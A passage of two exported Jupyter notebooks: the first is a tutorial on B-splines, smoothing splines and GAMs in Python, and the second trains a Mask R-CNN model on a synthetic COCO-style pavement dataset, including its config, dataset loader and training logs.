Questions to think about- Change the number of knots to 100 and see what happens. What would happen if we run a polynomial model of degree equal to the number of knots (a global one as in polynomial regression, not a spline)?- What makes a spline 'Natural'?
###Code
# Optional and Outside of the scope of this class: create the `epsilon` in the figure above
x = np.array([1.,0.,-1.5,0.,-1.5,0.])
y = np.array([1.5,1.,2.5,3,4,5])
t = np.linspace(0,5,6)
f = interp1d(t,x,kind='cubic')
g = interp1d(t,y,kind='cubic')
tplot = np.linspace(0,5,200)
plt.plot(x,y, '*', f(tplot), g(tplot));
###Output
_____no_output_____
###Markdown
B-Splines (Curry and Schoenberg(1966) , further study by de Boor, 1978)One way to construct a curve given a set of points is to *interpolate the points*, that is, to force the curve to pass through the points.A B-splines (Basis Splines) is defined by a set of **control points** and a set of **basis functions** that fit the function between these points. By choosing to have no smoothing factor we force the final B-spline to pass though all the points. If, on the other hand, we set a smothing factor, our function is more of an approximation with the control points as "guidance". The latter produced a smoother curve which is prefferable for drawing software. For more on Splines see: https://en.wikipedia.org/wiki/B-spline) or for a deeper look: *De Boor, C. (1978). A practical guide to splines (Applied mathematical sciences (Springer-Verlag New York Inc.) ; v. 27). New York: Springer-Verlag*.We will use [`scipy.splrep`](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.splrep.htmlscipy.interpolate.splrep) to calulate the coefficients for the B-Spline and draw it. B-Spline with no smooting
###Code
0.1e+01
from scipy.interpolate import splev, splrep
x = np.linspace(0, 10, 10)
y = np.sin(x)
# (t,c,k) is a tuple containing the vector of knots, coefficients, degree of the spline
t,c,k = splrep(x, y)
x2 = np.linspace(0, 10, 200)
y2 = BSpline(t,c,k)
plt.plot(x, y, 'o', x2, y2(x2))
plt.plot(t, np.zeros(len(t)), '*', label='knots')
plt.legend()
plt.show()
len(x), t,len(t), len(c), k
from scipy.interpolate import splrep
x = np.linspace(0, 10, 10)
y = np.sin(x)
# (tck) is a tuple containing the vector of knots,
# coefficients, degree of the spline
t,c,k = splrep(x, y, k=3)
# define the points to plot on (x2)
print(f'Knots ({len(t)} of them): {t}\n')
print(f'B-Spline coefficients ({len(c)} of them): {c}\n')
print(f'B-Spline degree {k}')
x2 = np.linspace(0, 10, 100)
y2 = BSpline(t, c, k)
plt.figure(figsize=(10,5))
plt.plot(x, y, 'o', label='true points')
plt.plot(x2, y2(x2), label='B-Spline')
tt = np.zeros(len(t))
plt.plot(t, tt,'g*', label='knots evaluated by the function')
plt.legend()
plt.show()
###Output
Knots (14 of them): [ 0. 0. 0. 0. 2.22222222 3.33333333
4.44444444 5.55555556 6.66666667 7.77777778 10. 10.
10. 10. ]
B-Spline coefficients (14 of them): [-4.94881722e-18 8.96543619e-01 1.39407154e+00 -2.36640266e-01
-1.18324030e+00 -8.16301228e-01 4.57836125e-01 1.48720677e+00
1.64338775e-01 -5.44021111e-01 0.00000000e+00 0.00000000e+00
0.00000000e+00 0.00000000e+00]
B-Spline degree 3
###Markdown
What do the tuple values returned by `scipy.splrep` mean?- The `t` variable is the array that contains the knots' position in the x axis. The length of this array is, of course, the number of knots.- The `c` variable is the array that holds the coefficients for the B-Spline. Its length should be the same as `t`.We have `number_of_knots - 1` B-spline basis elements to the spline constructed via this method, and they are defined as follows:$$\begin{aligned}B_{i, 0}(x) = 1, \textrm{if $t_i \le x < t_{i+1}$, otherwise $0$,} \\ \\B_{i, k}(x) = \frac{x - t_i}{t_{i+k} - t_i} B_{i, k-1}(x) + \frac{t_{i+k+1} - x}{t_{i+k+1} - t_{i+1}} B_{i+1, k-1}(x)\end{aligned}$$ - `t` $\in [t_1, t_2, ..., t_n]$ is the knot vector- `c` : are the spline coefficients- `k` : is the spline degree References: - [All you wanted to know about B-Splines](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.splrep.htmlscipy.interpolate.splrep) and were afraid to ask, or how `scipy.splrep` calculates B-spline representations.- For more on the [basis of B-splines](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.BSpline.html).- [scipy.interpolate.BSpline.basis_element](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.BSpline.basis_element.htmlscipy.interpolate.BSpline.basis_element).- Inside the documentation you will find references to books.
###Code
from scipy.interpolate import splev, splrep
from scipy.interpolate import BSpline
###Output
_____no_output_____
###Markdown
Constructing the B-spline basis elementsThe degree of the B-spline, `k`, is inferred from the length of `t` as `len(t)-2`. The knot vector is constructed by appending and prepending `k+1` elements to internal knots `t`.a) The first element is a B-spline of degree $d=0$ with $1$ knot (min number of knots = $d+2$)$(d=0), B_{i, 0}(x) = 1, \textrm{if $t_i \le x < t_{i+1}$, otherwise $0$, (0 interior knots, 2 total)}$b) The second element is a B-spline of degree $d=1$ with $2$ knots$(d=1), B_{i, 0}(x) = 1, \textrm{if $t_i \le x < t_{i+1}$, otherwise $0$, (1 interior knot, 3 total)}$and so on ...
###Code
b0 = BSpline.basis_element([0,1]) # two knots are the boundary nodes with 0 internal knots
b1 = BSpline.basis_element([0,1,2])
b2 = BSpline.basis_element([0,1,2,3])
b3 = BSpline.basis_element([0,1,2,3,4])
print(f'Knots for b3 = {b3.t[3:-3]}')
# B-splines add knots before and after the boundaries for better construction.
print(f'Augmented knots for b3 = {b3.t}')
fig, ax = plt.subplots()
x0 = np.linspace(0, 1, 50)
x1 = np.linspace(0, 2, 50)
x2 = np.linspace(0, 3, 50)
x3 = np.linspace(0, 4, 50)
ax.set_xlim(0,5);
ax.set_title(f'degree of basis : {b0.k}')
ax.plot(x0, b0(x0), 'g', label=f'B-element d={b0.k}', lw=3);
ax.plot(x1, b1(x1), 'brown', label=f'B-element d={b1.k}', lw=3);
ax.plot(x2, b2(x2), 'black', label=f'B-element d={b2.k}', lw=3);
ax.plot(x3, b3(x3), 'blue', label=f'B-element d={b3.k}', lw=3);
ax.legend();
###Output
Knots for b3 = [0. 1. 2. 3. 4.]
Augmented knots for b3 = [-1. -1. -1. 0. 1. 2. 3. 4. 5. 5. 5.]
###Markdown
B-Spline with smooting factor s
###Code
x = np.linspace(0, 10, 5)
y = np.sin(x)
s = 0.1 # add smoothing factor
# task needs to be set to 0, which represents:
# we are specifying a smoothing factor and thus only want
# splrep() to find the optimal t and c
task = 0
t,c,k = splrep(x, y, task=task, s=s)
print(f'Knots ({len(t)}): {t}, {k}')
# draw the line segments
linspline = interp1d(x, y)
# define the points to plot on (x2)
x2 = np.linspace(0, 10, 200)
y2 = BSpline(t, c, k)
plt.plot(x, y, 'o', x2, y2(x2), label='data')
plt.plot(x2, linspline(x2), label='linear interpolation')
#+0.2 is pertubating the line for visibility
plt.plot(x2, y2(x2)+0.2, 'blue', label='B-spline(moved)')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
B-Spline with given knots
###Code
x = np.linspace(0, 10, 100)
y = np.sin(x)
# ‘quantile’ knot sequence: the interior knots are the quantiles from the empirical
# distribution of the underlying variable. Quantile knots guarantee that each
# interval contains an equal number of sample observations
knots = np.quantile(x, [0.25, 0.5, 0.75])
print(knots)
# calculate the B-Spline
t,c,k = splrep(x, y, t=knots)
t
curve = BSpline(t,c,k)
curve
plt.scatter(x=x,y=y,c='grey', alpha=0.4)
yknots = np.sin(knots)
#plt.scatter(knots, yknots, c='r')
plt.scatter(knots, np.zeros(len(yknots)), c='r')
plt.plot(x,curve(x))
plt.show()
###Output
_____no_output_____
###Markdown
3 - GAMshttps://readthedocs.org/projects/pygam/downloads/pdf/latest/ Classification in `pyGAM`Let's get our (multivariate!) data, the `kyphosis` dataset, and the `LogisticGAM` model from `pyGAM` to do binary classification.- kyphosis - wherther a particular deformation was present post-operation- age - patient's age in months- number - the number of vertebrae involved in the operation- start - the number of the topmost vertebrae operated on
###Code
kyphosis = pd.read_csv("../data/kyphosis.csv")
display(kyphosis.head())
display(kyphosis.describe(include='all'))
display(kyphosis.dtypes)
# convert the outcome in a binary form, 1 or 0
kyphosis = pd.read_csv("../data/kyphosis.csv")
kyphosis["outcome"] = 1*(kyphosis["Kyphosis"] == "present")
kyphosis.describe()
kyphosis
from pygam import LogisticGAM, s, f, l
X = kyphosis[["Age","Number","Start"]]
y = kyphosis["outcome"]
kyph_gam = LogisticGAM().fit(X,y)
###Output
_____no_output_____
###Markdown
Outcome dependence on featuresTo help us see how the outcome depends on each feature, `pyGAM` has the `partial_dependence()` function.``` pdep, confi = kyph_gam.partial_dependence(term=i, X=XX, width=0.95)```For more on this see the : https://pygam.readthedocs.io/en/latest/api/logisticgam.html
###Code
res = kyph_gam.deviance_residuals(X,y)
for i, term in enumerate(kyph_gam.terms):
if term.isintercept:
continue
XX = kyph_gam.generate_X_grid(term=i)
pdep, confi = kyph_gam.partial_dependence(term=i, X=XX, width=0.95)
pdep2, _ = kyph_gam.partial_dependence(term=i, X=X, width=0.95)
plt.figure()
plt.scatter(X.iloc[:,term.feature], pdep2 + res)
plt.plot(XX[:, term.feature], pdep)
plt.plot(XX[:, term.feature], confi, c='r', ls='--')
plt.title(X.columns.values[term.feature])
plt.show()
###Output
_____no_output_____
###Markdown
Notice that we did not specify the basis functions in the .fit(). `pyGAM` figures them out for us by using $s()$ (splines) for numerical variables and $f()$ for categorical features. If this is not what we want we can manually specify the basis functions, as follows:
###Code
kyph_gam = LogisticGAM(s(0)+s(1)+s(2)).fit(X,y)
res = kyph_gam.deviance_residuals(X,y)
for i, term in enumerate(kyph_gam.terms):
if term.isintercept:
continue
XX = kyph_gam.generate_X_grid(term=i)
pdep, confi = kyph_gam.partial_dependence(term=i, X=XX, width=0.95)
pdep2, _ = kyph_gam.partial_dependence(term=i, X=X, width=0.95)
plt.figure()
plt.scatter(X.iloc[:,term.feature], pdep2 + res)
plt.plot(XX[:, term.feature], pdep)
plt.plot(XX[:, term.feature], confi, c='r', ls='--')
plt.title(X.columns.values[term.feature])
plt.show()
###Output
_____no_output_____
###Markdown
Regression in `pyGAM`For regression problems, we can use a `linearGAM` model. For this part we will use the `wages` dataset.https://pygam.readthedocs.io/en/latest/api/lineargam.html The `wages` datasetLet's inspect another dataset that is included in `pyGAM` that notes the wages of people based on their age, year of employment and education.
###Code
# from the pyGAM documentation
from pygam import LinearGAM, s, f
from pygam.datasets import wage
X, y = wage(return_X_y=True)
## model
gam = LinearGAM(s(0) + s(1) + f(2))
gam.gridsearch(X, y)
## plotting
plt.figure();
fig, axs = plt.subplots(1,3);
titles = ['year', 'age', 'education']
for i, ax in enumerate(axs):
XX = gam.generate_X_grid(term=i)
ax.plot(XX[:, i], gam.partial_dependence(term=i, X=XX))
ax.plot(XX[:, i], gam.partial_dependence(term=i, X=XX, width=.95)[1], c='r', ls='--')
if i == 0:
ax.set_ylim(-30,30)
ax.set_title(titles[i]);
###Output
100% (11 of 11) |########################| Elapsed Time: 0:00:00 Time: 0:00:00
###Markdown
4 - Smoothing Splines using csapsA smoothing spline is a solution of the problem of minimizing the *goodness-of-fit* and the *smoothing (wiggliness).* $MSE - \lambda\cdot\text{wiggle penalty}$ $=$ $p\sum_{i=1}^N \left(y_i - f(x_i)\right)^2 + (1-p) \int \left(f''(t)\right)^2 dt$, across all possible functions $f$. The p smoothing parameter is in the range of [0,1] with 0 giving you: the smoothing spline which is the least-squares straight line fit to the data, and 1: the natural cubic spline interpolant.
###Code
from csaps import csaps
np.random.seed(1234)
x = np.linspace(0,10,300000)
y = np.sin(x*2*np.pi)*x + np.random.randn(len(x))
xs = np.linspace(x[0], x[-1], 1000)
ys = csaps(x, y, xs, smooth=0.99)
print(ys.shape)
plt.plot(x, y, 'o', xs, ys, '-')
plt.show()
###Output
(1000,)
###Markdown
5 - Data fitting using pyGAM and Penalized B-SplinesWhen we use a spline in pyGAM we are effectively using a penalized B-Spline with a regularization parameter $\lambda$. E.g. ```LogisticGAM(s(0)+s(1, lam=0.5)+s(2)).fit(X,y) ``` Let's see how this smoothing works in `pyGAM`. We start by creating some arbitrary data and fitting them with a GAM. The lambda parameter (lam) goes from 0 to infinity. The default for the LinearGAM, is 0.6.
###Code
X = np.linspace(0,10,500)
y = np.sin(X*2*np.pi)*X + np.random.randn(len(X))
plt.scatter(X,y);
# let's try a large lambda first and lots of splines
gam = LinearGAM(lam=1e6, n_splines=50). fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____
###Markdown
We see that the large $\lambda$ forces a straight line, no flexibility. Let's see now what happens if we make it smaller.
###Code
# let's try a smaller lambda
gam = LinearGAM(lam=1e2, n_splines=50). fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____
###Markdown
There is some curvature there but still not a good fit. Let's try no penalty. That should have the line fit exactly.
###Code
# no penalty, let's try a 0 lambda
gam = LinearGAM(lam=0, n_splines=50). fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3)
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____
###Markdown
Yes, that is good. Now let's see what happens if we lessen the number of splines. The fit should not be as good.
###Code
# no penalty, let's try a 0 lambda
gam = LinearGAM(lam=0, n_splines=10).fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
# no penalty, let's try a 0 lambda
gam = LinearGAM().fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____ |
samples/pavement/train/train_mask_rcnn.ipynb | ###Markdown
Mask R-CNN Training and InferenceIn this notebook we use Matterport's implementation of Mask R-CNN to train on our synthetic dataset, then use the trained weights to run inference on new images.If you've never trained a neural network before, I wouldn't recommend starting here. Find a beginner deep learning tutorial/course and start there. I'd suggest the free course at https://course.fast.ai/. There are also lots of great free tutorials on YouTube, as well as paid courses on Udemy, Udacity, Coursera, etc. TensorFlow GPUYou definitely want TensorFlow GPU installed to run this notebook. Installation instructions are here:https://www.tensorflow.org/install/gpuThis includes installing CUDA, which is no small task. If you want to do serious image recognition, you just have to push through the pain.When I created this notebook, I updated my graphics driver to the latest, then installed the CUDA Toolkit and CUDNN. Tensorflow tends to not work if you have the wrong combo of CUDA/CUDNN, so I recommend checking out the [tested build configurations](https://www.tensorflow.org/install/sourcetested_build_configurations). It took me a few frustrating hours of searching and trial and error to get a combination that worked. KerasIt seems that the latest versions of Keras aren't compatible with the Mask R-CNN code. Using version 2.2.4 worked for me and other students. My Combo that Worked- **Python 3.6** (conda create -n tf-gpu python=3.6)- **CUDA Toolkit 10.0** [https://developer.nvidia.com/cuda-zone](https://developer.nvidia.com/cuda-zone)- **CUDNN 7.4.1** [https://developer.nvidia.com/cudnn](https://developer.nvidia.com/cudnn)- **tensorflow-gpu 1.13.1** (pip install tensorflow-gpu==1.13.1)- **keras 2.2.4** (pip install keras==2.2.4)
###Code
from google.colab import drive
drive.mount('/content/drive')
%load_ext autoreload
import os
import sys
import json
import numpy as np
import time
from PIL import Image, ImageDraw
from pathlib import Path
###Output
_____no_output_____
###Markdown
Import Matterport's "mrcnn" librariesI'm using Matterport's Mask_RCNN git repo: https://github.com/matterport/Mask_RCNN- Clone the Mask_RCNN repo to your computer.- Update the code cell below to point to the root directory of the repo.- Use pip to install everything from the requirements.txt file in that repo.Read through their documentation and issues if you have any trouble getting started.
###Code
# Set the ROOT_DIR variable to the root directory of the Mask_RCNN git repo
ROOT_DIR = '/content/drive/My Drive/Mask_RCNN-master/'
assert os.path.exists(ROOT_DIR), 'ROOT_DIR does not exist. Did you forget to read the instructions above? ;)'
# Import mrcnn libraries
sys.path.append(ROOT_DIR)
from mrcnn.config import Config
import mrcnn.utils as utils
from mrcnn import visualize
import mrcnn.model as modellib
###Output
_____no_output_____
###Markdown
Set up logging and pre-trained model pathsThis will default to sub-directories in your mask_rcnn_dir, but if you want them somewhere else, update it here.It will also download the pre-trained coco model.
###Code
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
###Output
_____no_output_____
###Markdown
ConfigurationDefine configurations for training on the box_dataset_synthetic dataset.- Look through the code cell below and update any lines relevant to your custom dataset.- You may want to change: - NAME (might want to be more specific) - NUM_CLASSES (always 1 + the number of object categories you have) - IMAGE_MIN_DIM (if you have larger training images) - IMAGE_MAX_DIM (if you have larger training images) - STEPS_PER_EPOCH (if you want to train on more images each epoch) NoteThese are settings that worked on my machine (GTX 970 graphics card). If you are getting OOM (Out of Memory) errors, you may need to tweak the settings or your computer may not be powerful enough. If you have a better graphics card, you will want to tweak it to take advantage of that.
###Code
class CocoSynthConfig(Config):
"""Configuration for training on the box_synthetic dataset.
Derives from the base Config class and overrides specific values.
"""
# Give the configuration a recognizable name
NAME = "cocosynth_dataset"
# Train on 1 GPU and 1 image per GPU. Batch size is 1 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 2 # background + 7 box types
# All of our training images are 512x512
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
# You can experiment with this number to see if it improves training
STEPS_PER_EPOCH = 5000
# This is how often validation is run. If you are using too much hard drive space
# on saved models (in the MODEL_DIR), try making this value larger.
VALIDATION_STEPS = 10
# Matterport originally used resnet101, but I downsized to fit it on my graphics card
BACKBONE = 'resnet50'
RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128)
TRAIN_ROIS_PER_IMAGE = 32
MAX_GT_INSTANCES = 50
POST_NMS_ROIS_INFERENCE = 500
POST_NMS_ROIS_TRAINING = 1000
config = CocoSynthConfig()
config.display()
###Output
Configurations:
BACKBONE resnet50
BACKBONE_STRIDES [4, 8, 16, 32, 64]
BATCH_SIZE 1
BBOX_STD_DEV [0.1 0.1 0.2 0.2]
COMPUTE_BACKBONE_SHAPE None
DETECTION_MAX_INSTANCES 100
DETECTION_MIN_CONFIDENCE 0.7
DETECTION_NMS_THRESHOLD 0.3
FPN_CLASSIF_FC_LAYERS_SIZE 1024
GPU_COUNT 1
GRADIENT_CLIP_NORM 5.0
IMAGES_PER_GPU 1
IMAGE_CHANNEL_COUNT 3
IMAGE_MAX_DIM 512
IMAGE_META_SIZE 15
IMAGE_MIN_DIM 512
IMAGE_MIN_SCALE 0
IMAGE_RESIZE_MODE square
IMAGE_SHAPE [512 512 3]
LEARNING_MOMENTUM 0.9
LEARNING_RATE 0.001
LOSS_WEIGHTS {'rpn_class_loss': 1.0, 'rpn_bbox_loss': 1.0, 'mrcnn_class_loss': 1.0, 'mrcnn_bbox_loss': 1.0, 'mrcnn_mask_loss': 1.0}
MASK_POOL_SIZE 14
MASK_SHAPE [28, 28]
MAX_GT_INSTANCES 50
MEAN_PIXEL [123.7 116.8 103.9]
MINI_MASK_SHAPE (56, 56)
NAME cocosynth_dataset
NUM_CLASSES 3
POOL_SIZE 7
POST_NMS_ROIS_INFERENCE 500
POST_NMS_ROIS_TRAINING 1000
PRE_NMS_LIMIT 6000
ROI_POSITIVE_RATIO 0.33
RPN_ANCHOR_RATIOS [0.5, 1, 2]
RPN_ANCHOR_SCALES (8, 16, 32, 64, 128)
RPN_ANCHOR_STRIDE 1
RPN_BBOX_STD_DEV [0.1 0.1 0.2 0.2]
RPN_NMS_THRESHOLD 0.7
RPN_TRAIN_ANCHORS_PER_IMAGE 256
STEPS_PER_EPOCH 5000
TOP_DOWN_PYRAMID_SIZE 256
TRAIN_BN False
TRAIN_ROIS_PER_IMAGE 32
USE_MINI_MASK True
USE_RPN_ROIS True
VALIDATION_STEPS 10
WEIGHT_DECAY 0.0001
###Markdown
Define the datasetI've attempted to make this generic to any COCO-like dataset. That means if you have another dataset defined in the COCO format, it should work.
###Code
class CocoLikeDataset(utils.Dataset):
""" Generates a COCO-like dataset, i.e. an image dataset annotated in the style of the COCO dataset.
See http://cocodataset.org/#home for more information.
"""
def load_data(self, annotation_json, images_dir):
""" Load the coco-like dataset from json
Args:
annotation_json: The path to the coco annotations json file
images_dir: The directory holding the images referred to by the json file
"""
# Load json from file
json_file = open(annotation_json)
coco_json = json.load(json_file)
json_file.close()
# Add the class names using the base method from utils.Dataset
source_name = "coco_like"
for category in coco_json['categories']:
class_id = category['id']
class_name = category['name']
if class_id < 1:
print('Error: Class id for "{}" cannot be less than one. (0 is reserved for the background)'.format(class_name))
return
self.add_class(source_name, class_id, class_name)
# Get all annotations
annotations = {}
for annotation in coco_json['annotations']:
image_id = annotation['image_id']
if image_id not in annotations:
annotations[image_id] = []
annotations[image_id].append(annotation)
# Get all images and add them to the dataset
seen_images = {}
for image in coco_json['images']:
image_id = image['id']
if image_id in seen_images:
print("Warning: Skipping duplicate image id: {}".format(image))
else:
seen_images[image_id] = image
try:
image_file_name = image['file_name']
image_width = image['width']
image_height = image['height']
except KeyError as key:
print("Warning: Skipping image (id: {}) with missing key: {}".format(image_id, key))
image_path = os.path.abspath(os.path.join(images_dir, image_file_name))
image_annotations = annotations[image_id]
# Add the image using the base method from utils.Dataset
self.add_image(
source=source_name,
image_id=image_id,
path=image_path,
width=image_width,
height=image_height,
annotations=image_annotations
)
def load_mask(self, image_id):
""" Load instance masks for the given image.
MaskRCNN expects masks in the form of a bitmap [height, width, instances].
Args:
image_id: The id of the image to load masks for
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
image_info = self.image_info[image_id]
annotations = image_info['annotations']
instance_masks = []
class_ids = []
for annotation in annotations:
class_id = annotation['category_id']
mask = Image.new('1', (image_info['width'], image_info['height']))
mask_draw = ImageDraw.ImageDraw(mask, '1')
for segmentation in annotation['segmentation']:
mask_draw.polygon(segmentation, fill=1)
bool_array = np.array(mask) > 0
instance_masks.append(bool_array)
class_ids.append(class_id)
mask = np.dstack(instance_masks)
class_ids = np.array(class_ids, dtype=np.int32)
return mask, class_ids
###Output
_____no_output_____
###Markdown
Create the Training and Validation DatasetsMake sure you link to the correct locations for your training dataset in the cell below.
###Code
dataset_train = CocoLikeDataset()
dataset_train.load_data('/content/drive/My Drive/01022020/output_train/coco_instances.json',
'/content/drive/My Drive/01022020/output_train/images')
dataset_train.prepare()
dataset_val = CocoLikeDataset()
dataset_val.load_data('/content/drive/My Drive/01022020/output_val/coco_instances.json',
'/content/drive/My Drive/01022020/output_val/images')
dataset_val.prepare()
###Output
_____no_output_____
###Markdown
Display a few images from the train and val datasetsThis will just make sure everything is set up correctly
###Code
for name, dataset in [('training', dataset_train), ('validation', dataset_val)]:
print(f'Displaying examples from {name} dataset:')
image_ids = np.random.choice(dataset.image_ids, 3)
for image_id in image_ids:
image = dataset.load_image(image_id)
mask, class_ids = dataset.load_mask(image_id)
visualize.display_top_masks(image, mask, class_ids, dataset.class_names)
###Output
Displaying examples from training dataset:
###Markdown
Create the Training Model and TrainThis code is largely borrowed from the train_shapes.ipynb notebook in the Matterport repo.
###Code
# Create model in training mode
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "last" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last(), by_name=True)
###Output
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:190: The name tf.get_default_session is deprecated. Please use tf.compat.v1.get_default_session instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:197: The name tf.ConfigProto is deprecated. Please use tf.compat.v1.ConfigProto instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:203: The name tf.Session is deprecated. Please use tf.compat.v1.Session instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:207: The name tf.global_variables is deprecated. Please use tf.compat.v1.global_variables instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:216: The name tf.is_variable_initialized is deprecated. Please use tf.compat.v1.is_variable_initialized instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:223: The name tf.variables_initializer is deprecated. Please use tf.compat.v1.variables_initializer instead.
Re-starting from epoch 62
###Markdown
TrainingTrain in two stages:1. Only the heads. Here we're freezing all the backbone layers and training only the randomly initialized layers (i.e. the ones that we didn't use pre-trained weights from MS COCO). To train only the head layers, pass layers='heads' to the train() function.2. Fine-tune all layers. For this simple example it's not necessary, but we're including it to show the process. Simply pass layers='all' to train all layers.
###Code
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
start_train = time.time()
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=60,
layers='heads')
end_train = time.time()
minutes = round((end_train - start_train) / 60, 2)
print(f'Training took {minutes} minutes')
# Fine tune all layers
# Passing layers="all" trains all layers. You can also
# pass a regular expression to select which layers to
# train by name pattern.
start_train = time.time()
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE / 10,
epochs=70,
layers="all")
end_train = time.time()
minutes = round((end_train - start_train) / 60, 2)
print(f'Training took {minutes} minutes')
###Output
Starting at epoch 62. LR=0.0001
Checkpoint Path: /content/drive/My Drive/Mask_RCNN-master/logs/cocosynth_dataset20200202T0200/mask_rcnn_cocosynth_dataset_{epoch:04d}.h5
Selecting layers to train
conv1 (Conv2D)
bn_conv1 (BatchNorm)
res2a_branch2a (Conv2D)
bn2a_branch2a (BatchNorm)
res2a_branch2b (Conv2D)
bn2a_branch2b (BatchNorm)
res2a_branch2c (Conv2D)
res2a_branch1 (Conv2D)
bn2a_branch2c (BatchNorm)
bn2a_branch1 (BatchNorm)
res2b_branch2a (Conv2D)
bn2b_branch2a (BatchNorm)
res2b_branch2b (Conv2D)
bn2b_branch2b (BatchNorm)
res2b_branch2c (Conv2D)
bn2b_branch2c (BatchNorm)
res2c_branch2a (Conv2D)
bn2c_branch2a (BatchNorm)
res2c_branch2b (Conv2D)
bn2c_branch2b (BatchNorm)
res2c_branch2c (Conv2D)
bn2c_branch2c (BatchNorm)
res3a_branch2a (Conv2D)
bn3a_branch2a (BatchNorm)
res3a_branch2b (Conv2D)
bn3a_branch2b (BatchNorm)
res3a_branch2c (Conv2D)
res3a_branch1 (Conv2D)
bn3a_branch2c (BatchNorm)
bn3a_branch1 (BatchNorm)
res3b_branch2a (Conv2D)
bn3b_branch2a (BatchNorm)
res3b_branch2b (Conv2D)
bn3b_branch2b (BatchNorm)
res3b_branch2c (Conv2D)
bn3b_branch2c (BatchNorm)
res3c_branch2a (Conv2D)
bn3c_branch2a (BatchNorm)
res3c_branch2b (Conv2D)
bn3c_branch2b (BatchNorm)
res3c_branch2c (Conv2D)
bn3c_branch2c (BatchNorm)
res3d_branch2a (Conv2D)
bn3d_branch2a (BatchNorm)
res3d_branch2b (Conv2D)
bn3d_branch2b (BatchNorm)
res3d_branch2c (Conv2D)
bn3d_branch2c (BatchNorm)
res4a_branch2a (Conv2D)
bn4a_branch2a (BatchNorm)
res4a_branch2b (Conv2D)
bn4a_branch2b (BatchNorm)
res4a_branch2c (Conv2D)
res4a_branch1 (Conv2D)
bn4a_branch2c (BatchNorm)
bn4a_branch1 (BatchNorm)
res4b_branch2a (Conv2D)
bn4b_branch2a (BatchNorm)
res4b_branch2b (Conv2D)
bn4b_branch2b (BatchNorm)
res4b_branch2c (Conv2D)
bn4b_branch2c (BatchNorm)
res4c_branch2a (Conv2D)
bn4c_branch2a (BatchNorm)
res4c_branch2b (Conv2D)
bn4c_branch2b (BatchNorm)
res4c_branch2c (Conv2D)
bn4c_branch2c (BatchNorm)
res4d_branch2a (Conv2D)
bn4d_branch2a (BatchNorm)
res4d_branch2b (Conv2D)
bn4d_branch2b (BatchNorm)
res4d_branch2c (Conv2D)
bn4d_branch2c (BatchNorm)
res4e_branch2a (Conv2D)
bn4e_branch2a (BatchNorm)
res4e_branch2b (Conv2D)
bn4e_branch2b (BatchNorm)
res4e_branch2c (Conv2D)
bn4e_branch2c (BatchNorm)
res4f_branch2a (Conv2D)
bn4f_branch2a (BatchNorm)
res4f_branch2b (Conv2D)
bn4f_branch2b (BatchNorm)
res4f_branch2c (Conv2D)
bn4f_branch2c (BatchNorm)
res5a_branch2a (Conv2D)
bn5a_branch2a (BatchNorm)
res5a_branch2b (Conv2D)
bn5a_branch2b (BatchNorm)
res5a_branch2c (Conv2D)
res5a_branch1 (Conv2D)
bn5a_branch2c (BatchNorm)
bn5a_branch1 (BatchNorm)
res5b_branch2a (Conv2D)
bn5b_branch2a (BatchNorm)
res5b_branch2b (Conv2D)
bn5b_branch2b (BatchNorm)
res5b_branch2c (Conv2D)
bn5b_branch2c (BatchNorm)
res5c_branch2a (Conv2D)
bn5c_branch2a (BatchNorm)
res5c_branch2b (Conv2D)
bn5c_branch2b (BatchNorm)
res5c_branch2c (Conv2D)
bn5c_branch2c (BatchNorm)
fpn_c5p5 (Conv2D)
fpn_c4p4 (Conv2D)
fpn_c3p3 (Conv2D)
fpn_c2p2 (Conv2D)
fpn_p5 (Conv2D)
fpn_p2 (Conv2D)
